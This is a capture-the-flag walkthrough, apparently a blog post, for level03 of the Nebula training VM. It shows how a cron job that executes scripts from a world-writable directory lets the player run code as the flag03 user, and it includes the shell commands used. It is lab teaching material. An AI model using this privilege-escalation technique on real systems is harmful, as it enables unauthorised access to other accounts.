Check the home directory of flag03 and take note of the files there.
There is a crontab that is called every couple of minutes.
cron is a utility used to run tasks periodically, found in nearly every distro.
In /home/flag03, we have a script – writable.sh – and a directory – writable.d.
level03@nebula:/home/flag03$ ls -sl total 1 0 drwxrwxrwx 1 flag03 flag03 40 2014-06-03 03:39 writable.d 1 -rwxr-xr-x 1 flag03 flag03 98 2011-11-20 21:22 writable.sh
Let’s take a look at writable.sh:
#!/bin/sh for i in /home/flag03/writable.d/* ; do (ulimit -t 5; bash -x "$i") rm -f "$i" done
This is fairly simple – for each file in the writable.d directory, execute the scripts contained within, and then delete them. bash -x runs the script in a trace mode, to give you a bit more detail about when it is running. I think we can ignore ulimit -t 5 – it just limits the CPU time available to the shell, possibly to stop a malicious script consuming excess resources.
Note that the writable.d directory is world read/write – so we can just put a script in there:
level03@nebula:~$ cat getflag.sh #!/bin/sh /bin/getflag >> /tmp/flag03.out level03@nebula:~$ cp getflag.sh /home/flag03/writable.d/
Then wait a short while, assuming that the writable.sh script is the one being run by cron…
level03@nebula:/tmp$ ls -sl total 4 4 -rw-rw-r-- 1 flag03 flag03 59 2014-06-04 09:39 flag03.out level03@nebula:/tmp$ cat flag03.out You have successfully executed getflag on a target account
Now – this is all well and good, but if we weren’t told that the script was run by cron, what could we do?
There is a root user in the Nebula VM, and using that I can do:
nebula@nebula:/var/spool/cron$ sudo crontab -u flag03 -l */3 * * * * /home/flag03/writable.sh
But I can’t do that as level03:
level03@nebula:/tmp$ crontab -u flag03 -l must be privileged to use -u
Also, I could use ps to see that the process runs, but that would presume that I knew it was cron’ed anyway.
So, not sure how I would go about finding cron jobs as an unprivileged user.
I’ve asked on the Unix Stack Exchange.